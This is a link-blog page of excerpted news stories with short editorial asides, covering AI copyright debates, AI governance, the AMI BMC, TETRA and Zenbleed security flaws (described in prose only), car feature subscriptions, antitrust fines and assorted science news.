The Linkielist

Linking ideas with the world

The Linkielist

AI Creation and Copyright: Unraveling the debate on originality, ownership

Whether AI systems can create original work sparks intense discussions among philosophers, jurists, and computer scientists and touches on issues of ownership, copyright, and economic competition, writes Stefano Quintarelli.

Stefano Quintarelli is an information technology specialist, a former member of the Italian Parliament and a former member of the European Commission’s High-level expert group on Artificial Intelligence.

Did Jesus Christ own the clothing he wore? In Umberto Eco’s landmark book “The Name of the Rose,” this is the central issue that is hotly debated by senior clergy, leading to internecine warfare. What is at stake is nothing less than the legitimacy of the church to own private property — and for clergy to grow rich in the process — since if Jesus did it then it would be permitted for his faithful servants.

Although it may not affect the future of an entity quite as dominant as the Catholic church, a similarly vexatious question is sparking heated debate today: Namely, can artificial intelligence systems create original work, or are they just parrots who repeat what they are told? Is what they do similar to human intelligence, or are they just echoes of things that have already been created by others?

The recent boom in generative artificial intelligence (AI) tools such as ChatGPT has spurred a flurry of multilateral initiatives as regulators attempt to respond to the breakneck pace of development of AI systems, write Carisa Nietsche and Camille Ford.

In this case, the debate is not among senior clergy, but philosophers, jurists and computer scientists (those who specialise in the workings of the human brain seem to be virtually absent from the discussion). Instead of threatening the wealth of the church, the answer to the question of machine intelligence raises issues that affect the ownership and wealth that flows from all human works.

Large language models (LLMs) such as Bard and ChatGPT are built by ingesting huge quantities of written material from the internet and learning to make connections and correlations between the words and phrases in those texts. The question is: When an AI engine produces something, is it generating a new creative work, as a human would, or is it merely generating a derivative work?

If the answer is that a machine does not ‘learn’ and therefore only synthesises or parrots existing work and does not ‘create’ then for legal and copyright purposes, its output could be considered a work derived from existing texts and therefore not its own creative work with all the rights that would be included.

In the early years of the commercial web, there was a similar debate over whether hyperlinks and short excerpts from articles or web pages should be considered derivative works. Those who believed they were, argued that Google should have to pay royalties on those links and excerpts when it included them in its search results.

My position at the time was that links with short excerpts should not be considered a derivative work, but rather a new kind of service that helped bring those works to a different audience, and therefore didn’t compete with the economic interests of the authors of those works or owners of those sites. Not only did the links or excerpts not cause them harm, they did the exact opposite.

Bard, Google’s eagerly awaited response to ChatGPT, was launched in Europe on Thursday (13 July), following delays in complying with the EU’s data protection rules.

This argument and extensions of it formed the basis for the birth of economic giants such as Google and Facebook, which could not have existed if they had to pay a ‘link tax’ for the content they indexed and linked to (although recent laws in countries such as Australia and Canada have changed that to some extent, and have forced Google and Facebook to pay newspapers for linking to their content).

But large language models don’t just produce links or excerpts. The responses they provide don’t lead the user to the original texts or sites, but instead become a substitute for them. The audience is arguably the same, and therefore there is undoubtedly economic competition. A large language model could become the only interface for access to and economic exploitation of that information.

It seems obvious that this will become a political issue in both the US and Europe, although the question of its legality could result in different answers, since the United States has a legal tradition of ‘fair use’, which allows companies such as Google to use work in various ways without having to license it, and without infringing on an owner’s copyright.

In Europe, no such tradition exists (British Commonwealth countries have a similar concept called ‘fair dealing,’ but it is much weaker).

It’s probably not a coincidence that the companies that created these AI engines are reluctant to say what texts or content the models were built on, since transparency could facilitate possible findings of copyright infringement (a number of prominent authors are currently suing OpenAI, owner of ChatGPT, because they believe their work was ingested by its large language model without permission).

The rise of generative AI models like ChatGPT and Midjourney AI, able to produce incredibly realistic content, poses an unprecedented challenge to the creative sector. We discuss what this new generation of Artificial Intelligence means for this sector and human …

A problem within the problem is that the players who promote these systems typically enjoy dominant positions in their respective markets, and are therefore not subject to special obligations to open up or become transparent. This is what happened with the ‘right to link’ that led the web giants to become gatekeepers — the freedom to link or excerpt created huge value that caused them to become dominant.

It’s not clear that the solution to these problems is to further restrict copyright so as to limit the creation of new large language models. In thinking about what measures to apply and how to evolve copyright in the age of artificial intelligence, we ought to think about rules that will also help open up downstream markets, not cement the market power that existing gatekeepers already have.

When the creators of AI talk about building systems that are smarter than humans, and defend their models as more than just ‘stochastic parrots’ who repeat whatever they are told, we need to keep in mind that these are more than just purely philosophical statements. There are significant economic interests involved, including the future exploitation of the wealth of information produced to date. And that rivals anything except possibly the wealth of the Catholic Church in the 1300’s, when Eco’s hero, William Of Baskerville, was asking questions about private property.

Source: AI Creation and Copyright: Unraveling the debate on originality, ownership – EURACTIV.com

US-EU AI Code of Conduct: First Step Towards Transatlantic Pillar of Global AI Governance?

The European Union, G7, United States, and United Kingdom have announced initiatives aiming to establish governance regimes and guidelines around the technology’s use.

Amidst these efforts, an announcement made in late May by EU Executive Vice-President Margrethe Vestager at the close of the Fourth Trade and Technology Council (TTC) Ministerial in Sweden revealed an upcoming U.S.-EU “AI Code of Conduct.”

This measure represents a first step in laying the transatlantic foundations for global AI governance.

The AI Code of Conduct was presented as a joint U.S.-EU initiative to produce a draft set of voluntary commitments for businesses to adopt. It aims to bridge the gap between different jurisdictions by developing a set of non-binding international standards for companies developing AI systems ahead of legislation being passed in any country.

The initiative aims to go beyond the EU and U.S. to eventually involve other countries, including Indonesia and India, and ultimately be presented before the G7.

At present, questions remain surrounding the scope of the Code of Conduct and whether it will contain monitoring or enforcement mechanisms.

The AI Code of Conduct – coupled with other TTC deliverables emerging from the U.S.-EU Joint AI Roadmap – signals a path forward for the emergence of a transatlantic pillar of global AI governance.

Importantly, this approach circumvents questions of regulatory alignment and creates room for a broader set of multilateral actors, as well as the private sector.

[…]

Source: US-EU AI Code of Conduct: First Step Towards Transatlantic Pillar of Global AI Governance? – EURACTIV.com

Android phones can now tell you if there’s an AirTag following you

When Google announced that trackers would be able to tie in to its 3 billion-device Bluetooth tracking network at its Google I/O 2023 conference, it also said that it would make it easier for people to avoid being tracked by trackers they don’t know about, like Apple AirTags.

Now Android users will soon get these “Unknown Tracker Alerts.” Based on the joint specification developed by Google and Apple, and incorporating feedback from tracker-makers like Tile and Chipolo, the alerts currently work only with AirTags, but Google says it will work with tag manufacturers to expand its coverage.

Android’s unknown tracker alerts, illustrated in moving Corporate Memphis style.

For now, if an AirTag you don’t own “is separated from its owner and determined to be traveling with you,” a notification will tell you this and that “the owner of the tracker can see its location.” Tapping the notification brings up a map tracing back to where it was first seen traveling with you. Google notes that this location data “is always encrypted and never shared with Google.”

Finally, Google offers a manual scan feature if you’re suspicious that your Android phone isn’t catching a tracker or want to see what’s nearby. The alerts are rolling out through a Google Play services update to devices on Android 6.0 and above over the coming weeks.

[…]

Source: Android phones can now tell you if there’s an AirTag following you

More than 1,300 UK experts call AI a force for good

An open letter signed by more than 1,300 experts says AI is a “force for good, not a threat to humanity”.

It was organised by BCS, the Chartered Institute for IT, to counter “AI doom”.

Rashik Parmar, BCS chief executive, said it showed the UK tech community didn’t believe the “nightmare scenario of evil robot overlords”.

In March, tech leaders including Elon Musk, who recently launched an AI business, signed a letter calling for a pause in developing powerful systems.

[…]

The letter argues: “The UK can help lead the way in setting professional and technical standards in AI roles, supported by a robust code of conduct, international collaboration and fully resourced regulation”.

By doing so, it says Britain “can become a global byword for high-quality, ethical, inclusive AI”.

In the autumn UK Prime Minister Rishi Sunak will host a global summit on AI regulation.

Source: More than 1,300 experts call AI a force for good – BBC News

Firmware vulnerabilities in millions of servers could give hackers superuser status

[…] The vulnerabilities reside inside firmware that Duluth, Georgia-based AMI makes for BMCs (baseboard management controllers). These tiny computers soldered into the motherboard of servers allow cloud centers, and sometimes their customers, to streamline the remote management of vast fleets of computers. They enable administrators to remotely reinstall OSes, install and uninstall apps, and control just about every other aspect of the system—even when it’s turned off. BMCs provide what’s known in the industry as “lights-out” system management.

[…]

These vulnerabilities range in severity from High to Critical, including unauthenticated remote code execution and unauthorized device access with superuser permissions. They can be exploited by remote attackers having access to Redfish remote management interfaces, or from a compromised host operating system. Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project often used in modern hyperscale environments.

[…]

The researchers went on to note that if they could locate the vulnerabilities and write exploits after analyzing the publicly available source code, there’s nothing stopping malicious actors from doing the same. And even without access to the source code, the vulnerabilities could still be identified by decompiling BMC firmware images. There’s no indication malicious parties have done so, but there’s also no way to know they haven’t.

The researchers privately notified AMI of the vulnerabilities, and the company created firmware patches, which are available to customers through a restricted support page. AMI has also published an advisory here.

The vulnerabilities are:

  • CVE-2023-34329, an authentication bypass via HTTP headers that has a severity rating of 9.9 out of 10, and
  • CVE-2023-34330, Code injection via Dynamic Redfish Extension. Its severity rating is 8.2.

[…]

“By spoofing certain HTTP headers, an attacker can trick BMC into believing that external communication is coming in from the USB0 internal interface,” the researchers wrote. “When this is combined on a system shipped with the No Auth option configured, the attacker can bypass authentication, and perform Redfish API actions.”

One example would be to create an account that poses as a legitimate administrator and has all system rights afforded one.

CVE-2023-34330, meanwhile, can be exploited on systems with the no auth setting to effectively execute code of their choice. In the event the no auth option isn’t enabled, the attackers first must have BMC credentials. That’s a higher bar but by no means out of reach for sophisticated actors.

[…]

Source: Firmware vulnerabilities in millions of computers could give hackers superuser status | Ars Technica

Janus, ‘two-faced’ hydrogen / helium white dwarf star

Scientists have observed a white dwarf star – a hot stellar remnant that is among the densest objects in the cosmos – that they have nicknamed Janus owing to the fact it has the peculiar distinction of being composed of hydrogen on one side and helium on the other.

[…]

The star is located in our Milky Way galaxy about 1,300 light years from Earth in the direction of the Cygnus constellation. A light year is the distance light travels in a year, 5.9 trillion miles (9.5 trillion km).

Janus is fairly massive for a white dwarf, with a mass 20% larger than that of our sun compressed into an object with a diameter half that of Earth. It rotates on its axis every 15 minutes – very fast considering these stars usually rotate every few hours to a few days.

“White dwarfs form at the very end of a star’s life. About 97% of all stars are destined to become white dwarfs when they die,” Caiazzo said.

[…]

After a white dwarf forms, its heavier elements are thought to sink to the star’s core while its lighter elements – hydrogen being the lightest, followed by helium – float to the top. This layered structure is believed to be destroyed at a certain stage in the evolution of some white dwarfs when a strong mixing blends the hydrogen and helium together.

Janus may represent a white dwarf in the midst of this transitional blending process, but with the puzzling development of one side being hydrogen while the other side is helium.

The researchers suspect that its magnetic field may be responsible for this asymmetry. If the magnetic field is stronger on one side than the other, as is often the case with celestial objects, one side could have less mixing of elements, becoming hydrogen heavy or helium heavy.

“Many white dwarfs are expected to go through this transition, and we might have caught one in the act because of its magnetic field configuration,” Caiazzo said.

[…]

Source: Introducing Janus, the exotic ‘two-faced’ white dwarf star | Reuters

Google Urges Gmail Users to Enable ‘Enhanced Safe Browsing’ for Faster, More Proactive Protection – but also takes screenshots of your browsing habits

The Washington Post’s “Tech Friend” newsletter has the latest on Google’s “Enhanced Safe Browsing” for Chrome and Gmail, which “monitors the web addresses of sites that you visit and compares them to constantly updated Google databases of suspected scam sites.” You’ll see a red warning screen if Google believes you’re on a website that is, for example, impersonating your bank. You can also check when you’re downloading a file to see if Google believes it might be a scam document. In the normal mode without Enhanced Safe Browsing, Google still does many of those same security checks. But the company might miss some of the rapid-fire activity of crooks who can create a fresh bogus website minutes after another one is blocked as a scam.

This enhanced security feature has been around for three years, but Google recently started putting a message in Gmail inboxes suggesting that people turn on Enhanced Safe Browsing.

Security experts told me that it’s a good idea to turn on this safety feature but that it comes with trade-offs. The company already knows plenty about you, particularly when you’re logged into Gmail, YouTube, Chrome or other Google services. If you turn on Enhanced Safe Browsing, Google may know even more about what sites you’re visiting even if you’re not signed into a Google account. It also collects bits of visual images from sites you’re visiting to scan for hallmarks of scam sites.

Google said it will only use this information to stop bad guys and train its computers to improve security for you and everyone else. You should make the call whether you are willing to give up some of your privacy for extra security protections from common crimes.
Gmail users can toggle the feature on or off at this URL. Google tells users that enabling the feature will provide “faster and more proactive protection against dangerous websites, downloads, and extensions.”

The Post’s reporter also asked Google why it doesn’t just enable the extra security automatically, and “The company told me that because Google is collecting more data in Enhanced Safe Browsing mode, it wants to ask your permission.”

The Post adds as an aside that “It’s also not your fault that phishing scams are everywhere. Our whole online security system is unsafe and stupid… Our goal should be to slowly replace the broken online security system with newer technologies that ditch our crime-prone password system for different methods of verifying we are who we say we are.”

Source: Google Urges Gmail Users to Enable ‘Enhanced Safe Browsing’ for Faster, More Proactive Protection – Slashdot

TETRA Military and Police Radio Code Encryption Has a Flaw: A built in Backdoor

For more than 25 years, a technology used for critical data and voice radio communications around the world has been shrouded in secrecy to prevent anyone from closely scrutinizing its security properties for vulnerabilities

[…]

The backdoor, known for years by vendors that sold the technology but not necessarily by customers, exists in an encryption algorithm baked into radios sold for commercial use in critical infrastructure. It’s used to transmit encrypted data and commands in pipelines, railways, the electric grid, mass transit, and freight trains. It would allow someone to snoop on communications to learn how a system works, then potentially send commands to the radios that could trigger blackouts, halt gas pipeline flows, or reroute trains.

Researchers found a second vulnerability in a different part of the same radio technology that is used in more specialized systems sold exclusively to police forces, prison personnel, military, intelligence agencies, and emergency services, such as the C2000 communication system used by Dutch police, fire brigades, ambulance services, and Ministry of Defense for mission-critical voice and data communications. The flaw would let someone decrypt encrypted voice and data communications and send fraudulent messages to spread misinformation or redirect personnel and forces during critical times.

[…]

The Dutch National Cyber Security Centre assumed the responsibility of notifying radio vendors and computer emergency response teams around the world about the problems, and of coordinating a timeframe for when the researchers should publicly disclose the issues.

In a brief email, NCSC spokesperson Miral Scheffer called TETRA “a crucial foundation for mission-critical communication in the Netherlands and around the world” and emphasized the need for such communications to always be reliable and secure, “especially during crisis situations.” She confirmed the vulnerabilities would let an attacker in the vicinity of impacted radios “intercept, manipulate or disturb” communications and said the NCSC had informed various organizations and governments, including Germany, Denmark, Belgium, and England, advising them how to proceed.

[…]

The researchers plan to present their findings next month at the BlackHat security conference in Las Vegas, when they will release detailed technical analysis as well as the secret TETRA encryption algorithms that have been unavailable to the public until now. They hope others with more expertise will dig into the algorithms to see if they can find other issues.

[…]

Although the standard itself is publicly available for review, the encryption algorithms are only available with a signed NDA to trusted parties, such as radio manufacturers. The vendors have to include protections in their products to make it difficult for anyone to extract the algorithms and analyze them.

[…]

Source: TETRA Radio Code Encryption Has a Flaw: A Backdoor | WIRED

AMD ‘Zenbleed’ bug allows Meltdown-like data leakage

AMD has started issuing some patches for its processors affected by a serious silicon-level bug dubbed Zenbleed that can be exploited by rogue users and malware to steal passwords, cryptographic keys, and other secrets from software running on a vulnerable system.

Zenbleed affects Ryzen and Epyc Zen 2 chips, and can be abused to swipe information at a rate of at least 30Kb per core per second. That’s practical enough for someone on a shared server, such as a cloud-hosted box, to spy on other tenants. Exploiting Zenbleed involves abusing speculative execution, though unlike the related Spectre family of design flaws, the bug is pretty easy to exploit. It is more on a par with Meltdown.

Malware already running on a system, or a rogue logged-in user, can exploit Zenbleed without any special privileges and inspect data as it is being processed by applications and the operating system, which can include sensitive secrets, such as passwords. It’s understood a malicious webpage, running some carefully crafted JavaScript, could quietly exploit Zenbleed on a personal computer to snoop on this information.

The vulnerability was highlighted today by Google infosec guru Tavis Ormandy, who discovered the data-leaking vulnerability while fuzzing hardware for flaws, and reported it to AMD in May. Ormandy, who acknowledged some of his colleagues for their help in investigating the security hole, said AMD intends to address the flaw with microcode upgrades, and urged users to “please update” their vulnerable machines as soon as they are able to.

Proof-of-concept exploit code, produced by Ormandy, is available here, and we’ve confirmed it works on a Zen 2 Epyc server system when running on the bare metal. While the exploit runs, it shows off the sensitive data being processed by the box, which can appear in fragments or in whole depending on the code running at the time.

If you stick any emulation layer in between, such as Qemu, then the exploit understandably fails.

What’s hit?

The bug affects all AMD Zen 2 processors including the following series: Ryzen 3000; Ryzen Pro 3000; Ryzen Threadripper 3000; Ryzen 4000 Pro; Ryzen 4000, 5000, and 7020 with Radeon Graphics; and Epyc Rome datacenter processors.

AMD today issued a security advisory here, using the identifiers AMD-SB-7008 and CVE-2023-20593 to track the vulnerability. The chip giant scored the flaw as a medium severity one, describing it as a “cross-process information leak.”

A microcode patch for Epyc 7002 processors is available now. As for the rest of its affected silicon: AMD is targeting December 2023 for updates for desktop systems (eg, Ryzen 3000 and Ryzen 4000 with Radeon); October for high-end desktops (eg, Threadripper 3000); November and December for workstations (eg, Threadripper Pro 3000); and November to December for mobile (laptop-grade) Ryzens. Shared systems are the priority, it would seem, which makes sense given the nature of the design blunder.

[…]

Source: AMD ‘Zenbleed’ bug allows Meltdown-like data leakage

Mercedes: Pay us again to unlock full accellaration on EQS and EQE – yes you already own the hardware.

Mercedes-Benz has new finalized pricing on its vexing “Acceleration Increase” subscription revealed last year that can eke out more electric performance — without any physical modification — from the automaker’s current EQE and EQS EV models, Car and Driver reports.

The updated Acceleration Increase pricing starts at $60 per month, or you can save about $120 and pay $600 per year instead. That pricing only applies to the AWD EQE 350 sedan and its SUV counterpart. Meanwhile, the pricier AWD EQS 450 car and SUV command a higher $90 per month (or $900 per year) rate for their own boost.

Mercedes-Benz had initially set the subscription at $1,200 per year, but now it’s been reduced a bit to a slightly-less-unreasonable rate. The automaker is also letting you pay a one-time fee of $1,950 on the EQE and $2,950 on the EQS to unlock the Acceleration Increase permanently.

The unlock increases acceleration and power output to the motors by 20 to 24 percent, according to Mercedes-Benz. The EQE’s 215kW total output increases to 260kW, and its 0–60 mph time decreases to 5.1 seconds (from 6) for the sedan and 5.2 seconds (from 6.2) on the SUV. Meanwhile, the EQS goes from 265kW to 330kW and decreases its 0–60 mph to 4.5 seconds (from 5.3) and 4.9 seconds (from 5.8) on the SUV.

For those who do choose the monthly subscription, they’d be paying the same as a full unlock in just under three years of owning either vehicle. It seems that Mercedes-Benz’s monthly subscription pricing model is designed for customers who are leasing the vehicle for a short period or only want to show off the performance temporarily while taking visiting friends or family on joy rides.

The era of automakers adding monthly subscriptions and microtransactions to vehicles is becoming a troubling trend. Tesla was early to selling such options when it offered a $3,250 unlock to use the full battery capacity of some older Model S vehicles. More recently, there have been cars with heated seats that are subject to software locks and subscriptions from Tesla and BMW, respectively.

The EQS and EQE aren’t the only artificially nerfed electric cars to offer paid unlocks. Polestar offers a $1,195 one-time fee for a boost, and Tesla also has a performance unlock for its EVs. But if you really want a quick EV and you’re willing to pay over $100,000 for an EQS already, you have quicker options in the Tesla Model S Plaid or the AMG version of the EQS.

Source: Mercedes-Benz’s EQS and EQE can be uncorked with a monthly fee – The Verge

How is this legal? You bought the car and the accellerative capacity already. But they will make you pay again to use it?

AI shows classroom conversations predict academic success

Who would have thought in-class, off-topic dialog can be a significant predictor of a student’s success in school? Scientists at Tsinghua University had a hunch and decided to deep-dive into how and AI may help an under-studied segment of the education pool: K-6th grade students learning in live, online classes.

By analyzing the classroom dialogs of these children, scientists at Tsinghua University developed neural network models to predict what behaviors may lead to a more successful student.

[…]

The researchers published their results in the Journal of Social Computing on March, 31. Valid findings were drawn from the data recorded and the models used that can be used to accurately predict .

“The most important message from this paper is that high-performing students, regardless of whether they are enrolled in STEM or non-STEM courses, consistently exhibit more , higher-level interactions concerning , and active participation in off-topic dialogs throughout the lesson,” said Jarder Luo, author and researcher of the study.

The implication here is that above the other markers of a successful student, which are cognition and positive emotion, the most important predictor of performance for STEM and non-STEM students is the interactive type of that student. In STEM students, the most crucial situation interactive types play in learning is during the middle stage of the lesson. In contrast, non-STEM students’ interactive types have about the same effect on the student’s performance during the middle and summary stages of the lesson.

Interactive dialog between students helps to streamline and integrate along with knowledge building; these open conversations help the young students navigate conversations generally, but more specifically conversations on topics the student is likely not very familiar with. This could be why the data so strongly suggests students more active in classroom dialog are typically higher-performing.

Additionally, the study also found that meta-cognition, that is, “thinking about thinking” is found to be more prevalent in higher-performing, non-STEM students than their STEM counterparts. This could be in part because science is often taught in a way that builds on a basis of knowledge, whereas other areas of study require a bit more planning and evaluation of the material.

[…]

Source: How AI can use classroom conversations to predict academic success

More information: Yuanyi Zhen et al, Prediction of Academic Performance of Students in Online Live Classroom Interactions—An Analysis Using Natural Language Processing and Deep Learning Methods, Journal of Social Computing (2023). DOI: 10.23919/JSC.2023.0007

Tesla directors agree to return $735 million following claims they were massively overpaid

Elon Musk, Larry Ellison and other current and former members of Tesla’s board of directors will return $735 million to settle claims that they massively overpaid themselves, Reuters has reported. The deal wraps up a saga that started in 2020 stemming from a lawsuit filed by a police and firefighter retirement fund challenging stock options granted to Tesla’s board starting in 2017. Directors also agreed not to receive compensation for 2021, 2022 and 2023, and change the way compensation is calculated.

Tesla’s current board includes Elon Musk, his brother Kimbal, Fox News mogul James Murdoch, Airbnb co-founder Joe Gebbia and former Tesla CTO JB Straubel. The case is separate from a lawsuit filed by shareholders against a $56 billion compensation package awarded to CEO Elon Musk.

The Police and Fire Retirement System of the City of Detroit accused Tesla’s board of giving itself unfair and excessive compensation in the form of 11 million stock options between 2017 and 2020, saying it grossly exceeded norms for a corporate board. The $735 million settlement will be paid back to Tesla in what’s called a “derivative lawsuit” — the largest ever awarded by Delaware’s Court of Chancerty, according to Reuters.

Tesla argued that stock options were used to ensure Director’s incentives were aligned with investor goals. Tesla has yet to comment on the affair, but in court documents, said that it agreed to settle to eliminate the risk of future litigation.

Tesla CEO Elon Musk is fighting a separate lawsuit to defend his $56 billion pay package. It was brought by shareholder Richard Tornette, who claimed that “the largest compensation grant in human history” was given to Musk, even though he didn’t focus entirely on Tesla. In 2020, he received the first of 12 $700 million payments as part of that package.

Source: Tesla reportedly suspected Musk was using company funds to build a literal glass house

Paris 2024 Olympics: Concern over French plan for AI surveillance

Under a recent law, police will be able to use CCTV algorithms to pick up anomalies such as crowd rushes, fights or unattended bags.

The law explicitly rules out using facial recognition technology, as adopted by China, for example, in order to trace “suspicious” individuals.

But opponents say it is a thin end of the wedge. Even though the experimental period allowed by the law ends in March 2025, they fear the French government’s real aim is to make the new security provisions permanent.

“We’ve seen this before at previous Olympic Games like in Japan, Brazil and Greece. What were supposed to be special security arrangements for the special circumstances of the games, ended up being normalised,” says Noémie Levain, of the digital rights campaign group La Quadrature du Net (Squaring the Web).

[…]

“We will not – and cannot by law – provide facial recognition, so this is a wholly different operation from what you see in China,” he says.

“What makes us attractive is that we provide security, but within the framework of the law and ethics.”

But according to digital rights activist Noémie Levain, this is only a “narrative” that developers are using to sell their product – knowing full well that the government will almost certainly favour French companies over foreign firms when it comes to awarding the Olympics contracts.

“They say it makes all the difference that here there will be no facial recognition. We say it is essentially the same,” she says.

“AI video monitoring is a surveillance tool which allows the state to analyse our bodies, our behaviour, and decide whether it is normal or suspicious. Even without facial recognition, it enables mass control.

“We see it as just as scary as what is happening in China. It’s the same principle of losing the right to be anonymous, the right to act how we want to act in public, the right not to be watched.”

Source: Paris 2024 Olympics: Concern over French plan for AI surveillance – BBC News

Dual wavelengths of light shown to be effective against antibiotic-resistant superbug bacterium

Scientists have combined two light wavelengths to deactivate a bacterium that is invulnerable to some of the world’s most widely used antibiotics, giving hope that the regime could be adapted as a potential disinfectant treatment.

Under the guidance of project leader Dr. Gale Brightwell, scientists at New Zealand’s AgResearch demonstrated the novel antimicrobial efficiency of a combination of two light wavelengths against a ‘superbug’ known as antibiotic-resistant extended-spectrum beta-lactamase E. coli.

[…]

A combination of far UVC (222 nm) and blue LED (405 nm) light have been shown to be effective in the inactivation of a wide range of microorganisms while being much safer to use and handle as compared to traditional UVC at 254 nm, she said.

“The E. coli we chose for this investigation were extended-spectrum beta- lactamases producing E. coli (ESBL-Ec) as these bacteria produce enzymes that break down and destroy commonly used , including penicillins and cephalosporins, making these drugs ineffective for treating infections,” she said.

[…]

The team found that a combination of dual far-UVC and blue LED light could be used to disinfect both antibiotic resistant and antibiotic sensitive E. coli, offering a non-thermal technology that may not drive further .

However, if exposed to sub-lethal levels of dual and far-UVC light, the antibiotic resistant E. coli tested did exhibit light tolerance. One surprising finding was that this light tolerance was only exhibited by the antibiotic resistant E. coli and not the antibiotic sensitive E. coli that was also tested.

Gardner says further work is needed to understand whether the light tolerance is due to a genetic change, or some other mechanism.

“It is also important to investigate the development of light tolerance in other antimicrobial-resistant bacteria and to determine the minimum dose of far-UVC light that can create light tolerance as well as the potential of further resistance development to other things such as sanitizers, heat, and pH in bacteria for application purposes,” she said.

The findings are published in the Journal of Applied Microbiology.

More information: Amanda Gardner et al, Light Tolerance of Extended Spectrum ß-lactamase Producing Escherichia coli Strains After Repetitive Exposure to Far-UVC and Blue LED Light, Journal of Applied Microbiology (2023). DOI: 10.1093/jambio/lxad124

Source: Dual wavelengths of light shown to be effective against antibiotic-resistant bacterium

Spain antitrust watchdog fines Amazon, Apple $218 million for collusion and exclusion

Spain’s antitrust watchdog on Tuesday said it had imposed fines worth a total 194.1 million euros ($218.03 million) on Amazon (AMZN.O) and Apple (AAPL.O) for colluding to limit the online sale of devices from Apple and competitors in Spain.

The two contracts the companies signed on Oct. 31, 2018 granting Amazon the status of authorized Apple dealer included anti-competitive clauses that affected the online market for electronic devices in Spain, CNMC, as the watchdog is known, said in a statement.

Apple was fined 143.6 million euros and Amazon 50.5 million euros. The two companies have two months to appeal the decision.

[…]

“The two companies restricted without justification the number of sellers of Apple products on the Amazon website in Spain,” CNMC said.

More than 90% of the existing retailers who were using Amazon’s market place to sell Apple devices were blocked as a result, it added.

Amazon also reduced the capacity of retailers in the European Union based outside Spain to access Spanish customers, and restricted the advertising Apple’s competitors were allowed to place on its website when users searched for Apple products, the regulator said.

Following the deal between the two tech giants, the prices of Apple devices sold online rose in Spain, it added.

[…]

Source: Spain antitrust watchdog fines Amazon, Apple $218 million | Reuters

Yay the power of a monopoly!

‘Taco Tuesday’ is no longer a copyrighted phrase – wait you can copyright a phrase like that?!

Taco Bell succeeded in its petition to remove the “Taco Tuesday” trademark held by Taco John’s, claiming it held an unfair monopoly over the phrase. Taco John’s CEO Jim Creel backed down from the fight on Tuesday, saying it isn’t worth the legal fees to retain the regional chain’s trademark.

“We’ve always prided ourselves on being the home of Taco Tuesday, but paying millions of dollars to lawyers to defend our mark just doesn’t feel like the right thing to do,” Taco John’s CEO Jim Creel said in a statement to CNN.

Taco John’s adopted the “Taco Tuesday” slogan back in the early 1980s as a two-for-one deal, labeling the promotion as “Taco Twosday” in an effort to ramp up sales. The company trademarked the term in 1989 and owned the right to the phrase in all states with the exception of New Jersey where Gregory’s Restaurant & Tavern beat out Taco John’s by trademarking the term in 1982.

Three decades later, Taco John’s finally received pushback when Taco Bell filed a petition with the U.S. Patent and Trademark Office in May to cancel the trademark, saying any restaurant should be able to use “Taco Tuesday.”

[…]

Source: ‘Taco Tuesday’ Has Been Liberated From Its Corporate Overlords

If you think about it, the ability to copyright 2 common words following each other doesn’t make sense at all really. In any 2 word combination, there must have been prior common use.

UK buys 3 radar E-7 planes for 90% of the price of original 5, creating huge capability gap, shows how broken procurement is

The United Kingdom’s deal to buy three, rather than the previously planned five Boeing E-7A Wedgetail airborne early warning and control (AEW&C) aircraft for the Royal Air Force “represents extremely poor value for money” and “an absolute folly.” Those are among the conclusions of a report published today by the U.K. Defense Committee, a body that examines Ministry of Defense (MoD) expenditure, administration, and policy on behalf of the British parliament.

A computer-generated rendering of an E-7A Wedgetail in RAF service. <em>Crown Copyright</em>

A computer-generated rendering of an E-7A Wedgetail in RAF service. Crown Copyright

At the center of the report’s criticism of the procurement is the fact that, as a result of a contract stipulation, the MoD is having to pay for all five Northrop Grumman Multi-role Electronically Scanned Array (MESA) radars, even though only three aircraft — which will be designated Wedgetail AEW1 in RAF service — are being acquired. The report assesses that the total cost of the three-aircraft order will be $2.5 billion, compared to the $2.7 billion agreed for five of the radar planes.

“Even basic arithmetic would suggest that ordering three E-7s rather than five (at some 90 [percent] of the original acquisition cost) represents extremely poor value for money,” the report contends.

The E-7 procurement is one of three major defense deals dealt with by the report, which comes at the end of a six-month inquiry. The Type 26 anti-submarine warfare frigate for the Royal Navy and the Ajax armored fighting vehicle for the British Army also come in for criticism. Worryingly, the overall conclusion is that the U.K.’s defense procurement system is “broken” and that “multiple, successive reviews have not yet fixed it.”

[…]

The report suggests that the tiny fleet will be a “prize target” for aggressors. Not only will the AEW&C aircraft play a critical role in any high-end air campaign, but also planes of this type are increasingly under threat from long-range air defenses and are far from survivable in any kind of contested airspace.

The same report also warns that the initial operating capability for the RAF E-7s could be delayed by a further year to 2025. This is especially concerning considering that the RAF retired its previous E-3D Sentry AEW1 radar planes in 2021, leaving a massive capability gap.

[…]

Other problems are dogging the U.K.’s plans to field the E-7, the report explains, including the failure of Boeing and the British procurement arm, Defense Equipment and Support (DE&S), to agree on an in-service support contract. The report says that such a contract “should already have been successfully finalized long ago.”

[…]

Source: UK’s E-7 Radar Jet Deal Slammed As “Absolute Folly” In New Report

So procurement can’t argue that although the savings in initial procurement are minimal, the savings on the through life costs will be huge – because it has no idea what the through life costs of the platform are!

Stability AI releases Stable Doodle, a sketch-to-image tool

Stability AI, the startup behind the image-generating model Stable Diffusion, is launching a new service that turns sketches into images.

The sketch-to-image service, Stable Doodle, leverages the latest Stable Diffusion model to analyze the outline of a sketch and generate a “visually pleasing” artistic rendition of it. It’s available starting today through ClipDrop, a platform Stability acquired in March through its purchase of Init ML, an AI startup founded by ex-Googlers,

[…]

Under the hood, powering Stable Doodle is a Stable Diffusion model — Stable Diffusion XL — paired with a “conditional control solution” developed by one of Tencent’s R&D divisions, the Applied Research Center (ARC). Called T2I-Adapter, the control solution both allows Stable Diffusion XL to accept sketches as input and guides the model to enable better fine-tuning of the output artwork.

[…]

Source: Stability AI releases Stable Doodle, a sketch-to-image tool | TechCrunch

Find it at https://clipdrop.co/stable-doodle

Research group develops biodegradable film that keeps food fresh for longer

[…]

a film made of a compound derived from limonene, the main component of citrus fruit peel, and chitosan, a biopolymer derived from the chitin present in exoskeletons of crustaceans.

The film was developed by a research group in São Paulo state, Brazil, comprising scientists in the Department of Materials Engineering and Bioprocesses at the State University of Campinas’s School of Chemical Engineering (FEQ-UNICAMP) and the Packaging Technology Center at the Institute of Food Technology (ITAL) of the São Paulo State Department of Agriculture and Supply, also in Campinas.

The results of the research are reported in an article published in Food Packaging and Shelf Life.

[…]

